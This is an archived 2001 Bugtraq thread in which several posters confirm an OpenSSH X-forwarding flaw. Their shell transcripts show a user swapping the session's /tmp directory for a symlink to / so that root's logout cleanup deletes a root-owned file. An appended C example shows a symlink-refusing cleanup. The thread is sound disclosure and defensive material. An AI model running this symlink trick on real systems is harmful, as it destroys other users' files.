Bugtraq mailing list archives

Re: SSH allows deletion of other users files...


From: aleph1 () securityfocus com
Date: Tue, 5 Jun 2001 11:30:37 -0600

Tomas Ericsson <te () matematik su se>

The vulnerability works perfectly for me:
sshd version OpenSSH_2.3.0 green () FreeBSD org 20010321

# uname -a
FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
root () jkh101 osd bsdi com:/usr/src/sys/compile/GENERIC  alpha

[root@myhost root]# echo "testing">/cookies
[root@myhost root]# ls -l /cookies
-rw-r--r--  1 root  wheel  8 Jun  5 01:48 /cookies
[root@myhost root]# ssh -l te myhost
[te@myhost te]# rm -rf /tmp/ssh-1i24iea5
[te@myhost te]# ln -s / /tmp/ssh-1i24iea5
[te@myhost te]# logout
[root@myhost root]# ls -l /cookies
ls: /cookies: No such file or directory


Shannon Lee <shannon () scatter com>

Reproduced with OpenSSH_2.3.0p1 on redhat 6.2.


TE <te () linux nu>

This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
updated packages from RedHat installed.

RH71# uname -a
Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
RH71# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-5

RH70# uname -a 
Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
RH70# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-1.7.2 


"David Thiel" <dthiel () nexprise com>

I tested this on 4.3-RELEASE, and was successful.
SSH Version OpenSSH_2.3.0 green () FreeBSD org 20010321


KF <dotslash () snosoft com>

Works on my box

[root@bounce dotslash]# cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)
root@bounce dotslash]# ssh -V
SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
Compiled with SSL (0x0090581f).


Jan-Frode Myklebust <janfrode () parallab uib no>

I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
and OpenSSH_2.9p1 on IRIX 6.5 and both are
vulnerable to this. I used protocol version 2 on
both machines.


Luciano Miguel Ferreira Rocha <strange () nsk yi org>

Confirmed on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
X forwarding activated.


"Golden_Eternity" <bhodi () bigfoot com>

I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
locate the /tmp/ssh-* directory.

What version of ssh were you using when you discovered this?

[test@shiva test]$ ssh test@localhost
warning: Need basic cursor movement capablity, using vt100
test's password:
Authentication successful.
Last login: Mon Jun 04 2001 10:42:08 -0700
No mail.
[test@shiva test]$ ls -l /tmp/
total 12
drwxr-xr-x    2 root     root        12288 Apr  8 11:59 lost+found
[test@shiva test]$


"Schlosser, Matt D." <mschlosser () eschelon com>

On the contrary, it just takes another form:

[root@bob /root]# touch /cookies;ls /cookies
/cookies
[root@bob /root]# ssh zen@localhost
zen@localhost's password:
[zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
[zen@bob zen]$ logout
Connection to localhost closed.
[root@bob /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

-- 
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
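
The transcripts above show a logout-time cleanup removing a file through whatever now sits at the session's /tmp path. The following C code is an added example, not part of the original thread and not OpenSSH's code, showing a privileged cleanup that refuses a swapped-in symlink. It assumes the cleanup unlinks one fixed file name inside a per-session directory and then removes that directory (inferred from the transcripts); `safe_cleanup`, `demo` and the `/tmp/cleanup-demo-*` paths are hypothetical.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Remove dir/name, then dir, only if dir is a real directory owned by
 * `owner`. Returns 0 on success, -1 on refusal or error. */
int safe_cleanup(const char *dir, const char *name, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW makes open() fail if `dir` itself is a symlink. */
    int fd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    /* Check the object we actually opened, not the path again. */
    if (fstat(fd, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != owner) {
        close(fd);
        return -1;
    }
    /* Resolved relative to fd; removes a symlink at `name`, not its target. */
    int rc = unlinkat(fd, name, 0);
    close(fd);
    return rc != 0 ? -1 : rmdir(dir); /* rmdir() fails on a symlink */
}

/* Constructed scenario. swapped=1: "sess" is a symlink to another directory
 * holding "cookies". Returns 1 if the outcome is the safe one. */
int demo(int swapped)
{
    char base[] = "/tmp/cleanup-demo-XXXXXX", real[64], file[80], sess[64];
    if (!mkdtemp(base))
        return -1;
    snprintf(sess, sizeof sess, "%s/sess", base);
    snprintf(real, sizeof real, "%s/%s", base, swapped ? "victim" : "sess");
    snprintf(file, sizeof file, "%s/cookies", real);
    int fd = mkdir(real, 0700) == 0 ? open(file, O_CREAT | O_WRONLY, 0600) : -1;
    if (fd < 0 || close(fd) != 0 || (swapped && symlink(real, sess) != 0))
        return -1;
    int rc = safe_cleanup(sess, "cookies", getuid());
    int survived = access(file, F_OK) == 0;
    return swapped ? (rc == -1 && survived) : (rc == 0 && !survived);
}

int main(void)
{
    printf("symlink refused: %d, real dir removed: %d\n", demo(1), demo(0));
    return 0;
}
```

The final `rmdir(dir)` still goes by path, so a racing user could at most get a different empty directory removed; running the whole cleanup with the session user's privileges instead of root's closes that remaining gap.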

